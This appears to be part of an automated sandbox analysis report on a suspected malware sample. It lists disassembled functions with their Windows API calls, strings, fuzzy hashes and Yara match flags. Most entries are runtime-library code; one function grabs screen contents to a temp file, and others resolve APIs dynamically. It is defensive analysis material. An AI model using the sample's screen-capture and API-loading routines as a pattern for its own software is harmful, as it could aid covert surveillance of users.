CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0215E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0215E989
_free.LIBCMT ref: 0215E99F
_free.LIBCMT ref: 0215E9B0
_free.LIBCMT ref: 0215E9C1
_free.LIBCMT ref: 0215E9D8
GetCPInfo.KERNEL32(?,?), ref: 0215EA20

Part of subcall function 02166952: _free.LIBCMT ref: 021669BD

_free.LIBCMT ref: 0215EBCC
_free.LIBCMT ref: 0215EBDF
_free.LIBCMT ref: 0215EBED
_free.LIBCMT ref: 0215EBF8
_free.LIBCMT ref: 0215EC3A
_free.LIBCMT ref: 0215EC42
_free.LIBCMT ref: 0215EC4A
_free.LIBCMT ref: 0215EC52
_free.LIBCMT ref: 0215EC60

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: 227833f0ff1242aff9a42386ab36414ecdd3be37004fa2fba5ffd83663a823bf
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: 53B1AC71D40219DFDB219F68C884BEEBBF5BF08304F1441ADE8A9A7241DB75AA51CB60

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 0216A85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0216A8A3

Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C0F
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C21
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C33
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C45
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C57
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C69
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C7B
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C8D
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169C9F
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169CB1
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169CC3
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169CD5
Part of subcall function 02169BF2: _free.LIBCMT ref: 02169CE7

_free.LIBCMT ref: 0216A898

Part of subcall function 021636D1: HeapFree.KERNEL32(00000000,00000000,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?), ref: 021636E7
Part of subcall function 021636D1: GetLastError.KERNEL32(?,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?,?), ref: 021636F9

_free.LIBCMT ref: 0216A8BA
_free.LIBCMT ref: 0216A8CF
_free.LIBCMT ref: 0216A8DA
_free.LIBCMT ref: 0216A8FC
_free.LIBCMT ref: 0216A90F
_free.LIBCMT ref: 0216A91D
_free.LIBCMT ref: 0216A928
_free.LIBCMT ref: 0216A960
_free.LIBCMT ref: 0216A967
_free.LIBCMT ref: 0216A984
_free.LIBCMT ref: 0216A99C

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: b6b03f76fc6357be06d9a30ddf891b4198c39285e4b4854eaf165689706f3ada
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 68316032680201DFEB206F38D84CB7EB7E9BF00755F214469E459E7650DB71A9B1CB64

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 0214EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0214F228,00000004,02147D87,00000004,02148069), ref: 0214EEF9
GetLastError.KERNEL32(?,0214F228,00000004,02147D87,00000004,02148069,?,02148799,?,00000008,0214800D,00000000,?,?,00000000,?), ref: 0214EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0214F228,00000004,02147D87,00000004,02148069,?,02148799,?,00000008,0214800D,00000000,?,?,00000000), ref: 0214EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0214EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF9D

Strings

advapi32.dll, xrefs: 0214EEF3, 0214EEF8, 0214EF14

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: c840f61a15adc975082312bda35847818f865b6167afb9083a9e308290db9bf6
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: BB2151B5944710BFE7106FB49C08A5ABFA8FF05B16F104A2AF955E3650CB7C94818FA8

Function 0214EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0214F228,00000004,02147D87,00000004,02148069), ref: 0214EEF9
GetLastError.KERNEL32(?,0214F228,00000004,02147D87,00000004,02148069,?,02148799,?,00000008,0214800D,00000000,?,?,00000000,?), ref: 0214EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0214F228,00000004,02147D87,00000004,02148069,?,02148799,?,00000008,0214800D,00000000,?,?,00000000), ref: 0214EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0214EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0214EF9D

Strings

advapi32.dll, xrefs: 0214EEF3, 0214EEF8, 0214EF14

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 2f48ff6a819a28fa2bac8da2f7a43a607b1addf15b19ed18894aeaf53d20762d
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 022162B5944710BFE7106F749C08A5ABFECFF05B16F104A26F955D3650CB7C94818BA8

Function 021424A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0214670B), ref: 021424B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021424C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021424D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0214670B), ref: 02142500
GetProcAddress.KERNEL32(00000000), ref: 02142507
GetLastError.KERNEL32(?,?,?,0214670B), ref: 02142522
GetLastError.KERNEL32(?,?,?,0214670B), ref: 0214252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02142544
__CxxThrowException@8.LIBVCRUNTIME ref: 02142552

Strings

kernel32.dll, xrefs: 021424B0, 021424B5, 021424FA

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: 168d8e2ffac806c28218c1743b9a7e198dec3780ae0b2e2dbc1c9cc971f895c9
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: 8D11C2759403107FE7107B746C59AAB3BAC9F06B127200536BC09E6191EF38D5808A6C

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

switchState, xrefs: 00424882
pContext, xrefs: 00424946

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 02150C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02150C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02150C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02150CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02150D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02150D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02150D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02150D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02150D80
__CxxThrowException@8.LIBVCRUNTIME ref: 02150DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02150DBC

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: ffa1e8ddfaed42d709205727d592b8ed7acd1329c7111499019dfe15b3eb47fc
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: 3041A330A84268DECF15FFE4C4547ED7766AF0A304F1440E9DC696B282CF769A05CB61

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 0216204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02162061

Part of subcall function 021636D1: HeapFree.KERNEL32(00000000,00000000,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?), ref: 021636E7
Part of subcall function 021636D1: GetLastError.KERNEL32(?,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?,?), ref: 021636F9

_free.LIBCMT ref: 0216206D
_free.LIBCMT ref: 02162078
_free.LIBCMT ref: 02162083
_free.LIBCMT ref: 0216208E
_free.LIBCMT ref: 02162099
_free.LIBCMT ref: 021620A4
_free.LIBCMT ref: 021620AF
_free.LIBCMT ref: 021620BA
_free.LIBCMT ref: 021620C8

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: cb558da8c300a41bac71fd6e805232c44f29381bc1574b2b8ca7f9ed3c805ec0
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 45114276650108BFCB41EF94C949DED3BA6EF04750B5181A5BA188F261DB71EFB09F80

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

asin, xrefs: 0043F031
sqrt, xrefs: 0043F049
pow, xrefs: 0043EFA9, 0043F055, 0043F068
log, xrefs: 0043EF6B, 0043EF77
acos, xrefs: 0043F03D
exp, xrefs: 0043EF8A, 0043EFEC
log10, xrefs: 0043EF0F, 0043EF5F

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 02163190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
Instruction ID: 6b7ec6370aded5efa2bf1dcc64a0039076c690dbc9983858eda2628b2741bb28
Opcode Fuzzy Hash: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
Instruction Fuzzy Hash: 11C1D370E84249AFDB16DFA9C848BBEBBB1AF09714F0841D9E874A7391C7309951CF61

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

csm, xrefs: 004287A6
fB, xrefs: 004287AE, 004287B7, 004287C8

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

